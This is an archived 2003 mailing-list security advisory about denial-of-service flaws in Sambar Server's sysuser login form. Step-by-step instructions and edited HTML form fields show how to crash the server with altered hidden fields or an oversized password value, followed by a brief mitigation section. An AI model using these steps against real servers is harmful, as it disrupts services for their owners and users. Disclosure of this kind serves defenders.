[<prev] [next>] [day] [month] [year] [list]
Message-ID: <34046.80.58.4.44.1049139046.squirrel@madrid7.amenworld.com>
Date: Mon, 31 Mar 2003 21:30:46 +0200 (CEST)
From: "Lorenzo Hernandez Garcia-Hierro" <security@...enzohgh.com>
To: <bugtraq@...urityfocus.com>
Cc: <vuln-dev@...urityfocus.com>, <pen-test@...urityfocus.com>,
<focus-ids@...urityfocus.com>, <full-disclosure@...ts.netsys.com>,
<incidents@...urityfocus.com>, <webappsec@...urityfocus.com>,
<sambar@...bar.ch>, <sambar@...bar.com>
Subject: Sambar Server "Buffer OverFlow" Vulnerabilities
**** THE SAMBAR SERVER BUFFER OVERFLOW IN SYSUSER LOGIN SYSTEM *****
RISK ( by mine) : 7 (1/10)
SYSTES AFFECTED: All Sambar Server systems with sysuser login included.
VULNERABILITIES: 2 KNOWN ( can be more)
DESCRIPTION:
This vulnerability is caused because the form that the Sambar Server demon
doesn't examinates the buffer and sizes of the login form transfer, the
only protection for the server is the values at the form in the html code
( the max value of the RCPassword input) , this can be a vulnerability if
the server is public-exposed and the directories of the sysuser is known.
METHOD TO XPLOIT IT:
You must be sure and known the true path (at sambar root like c:\sambar )
of the sysuser login form, now follow this easy steps:
1st: go to the webserver sysuser login form path , like
http://localhost/sysuser/index.stm (you must specify the index.stm for the
RPC called locally trough index.stm ).
2nd: copy and paste the code of the form ( total page ) and paste it in a
blank text field , rename to a something.html .
3th: put in the correct fields the http://localhost or url for your sambar
server installation ,this is for the form and images , of course, the form
must be connect to the correct url address of the server script.
The code goes like here:
[FORM METHOD=POST ACTION="http://localhost/session/login" onsubmit="return
FormValidator(this)"]
[INPUT TYPE=hidden NAME="RCpage"
VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop
installation.
[INPUT TYPE=hidden NAME="onfailure"
VALUE="http://localhost/sysuser/relogin.stm"]*you can modify this to more
buffer over flow like to a cgi script (this can be a DoS attack
[INPUT TYPE=hidden NAME="start" VALUE=1>
[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
[INPUT TYPE=hidden NAME="RCScount" VALUE="25]
[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
[INPUT TYPE=hidden NAME="RCSpath" VALUE="/]
[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *This is the problem!*
[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*This is the problem!*
[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]
4th: now you can try to refresh and login , use a valid user and password
if you want to prove the vulnerability number one or go to the 6th step!
5th: now you must push on the submit button , wait , and if you are
running the server on your computer the server pick up and becomes
unstable , if you continue sending this attemps the server must be
restarted or the computer restarted during the attack!.
6th: the second vulnerability is the bffer overflow in form fields of
password ( you can learn more about this in the advisory of Allaire
'ColdFusion Buffer OverFlow in form fields') , you can insert more than
million of characters and submit it but you must edit the form code in
your computer:
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< change this to...
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="here put your text, more than
hundred thousand characters"]
and..........
7th: push on submit and the server pick up too!
SOLUTION:
I don't know a completly solutions because this vulnerability is the
ancient and older type of vulnerability and the only possible solution
is...
- Change the path and directory of the sambar server user files!
- the developers of sambar server can change the code and develop a module
for examine the trafic of user files and buffers of form transfer in POST
or GET mode.
----------------
CONTACT:
NAME: Lorenzo Hernandez Garcia-Hierro
MAIL: security@...enzohgh.com
WEBSITE: www.lorenzohgh.com
----------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists